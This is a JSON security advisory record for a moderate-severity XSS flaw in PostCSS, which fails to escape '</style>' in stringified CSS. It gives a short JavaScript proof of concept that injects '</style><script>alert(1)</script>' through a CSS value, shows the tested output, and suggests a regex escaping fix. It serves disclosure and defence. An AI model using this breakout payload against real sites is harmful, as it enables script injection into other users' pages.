{"id":"GHSA-qx2v-qp2m-jg93","summary":"PostCSS has XSS via Unescaped \u003c/style\u003e in its CSS Stringify Output","details":"# PostCSS: XSS via Unescaped `\u003c/style\u003e` in CSS Stringify Output\n\n## Summary\n\nPostCSS v8.5.5 (latest) does not escape `\u003c/style\u003e` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `\u003cstyle\u003e` tags, `\u003c/style\u003e` in CSS values breaks out of the style context, enabling XSS.\n\n## Proof of Concept\n\n```javascript\nconst postcss = require('postcss');\n\n// Parse user CSS and re-stringify for page embedding\nconst userCSS = 'body { content: \"\u003c/style\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003cstyle\u003e\"; }';\nconst ast = postcss.parse(userCSS);\nconst output = ast.toResult().css;\nconst html = `\u003cstyle\u003e${output}\u003c/style\u003e`;\n\nconsole.log(html);\n// \u003cstyle\u003ebody { content: \"\u003c/style\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003cstyle\u003e\"; }\u003c/style\u003e\n//\n// Browser: \u003c/style\u003e closes the style tag, \u003cscript\u003e executes\n```\n\n**Tested output** (Node.js v22, postcss v8.5.5):\n```\nInput: body { content: \"\u003c/style\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003cstyle\u003e\"; }\nOutput: body { content: \"\u003c/style\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003cstyle\u003e\"; }\nContains \u003c/style\u003e: true\n```\n\n## Impact\n\nImpact non-bundler use cases since bundlers for XSS on their own. Requires some PostCSS plugin to have malware code, which can inject XSS to website.\n\n## Suggested Fix\n\nEscape `\u003c/style` in all stringified output values:\n```javascript\noutput = output.replace(/\u003c\\/(style)/gi, '\u003c\\\\/$1');\n```\n\n## Credits\nDiscovered and reported by [Sunil Kumar](https://tharvid.in) ([@TharVid](https://github.com/TharVid))","aliases":["CVE-2026-41305"],"modified":"2026-07-17T21:05:45.340097678Z","published":"2026-04-24T15:31:42Z","database_specific":{"nvd_published_at":"2026-04-24T03:16:11Z","cwe_ids":["CWE-79"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2026-04-24T15:31:42Z"},"references":[{"type":"WEB","url":"https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41305"},{"type":"PACKAGE","url":"https://github.com/postcss/postcss"},{"type":"WEB","url":"https://github.com/postcss/postcss/releases/tag/8.5.10"}],"affected":[{"package":{"name":"postcss","ecosystem":"npm","purl":"pkg:npm/postcss"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"8.5.10"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-qx2v-qp2m-jg93/GHSA-qx2v-qp2m-jg93.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}]}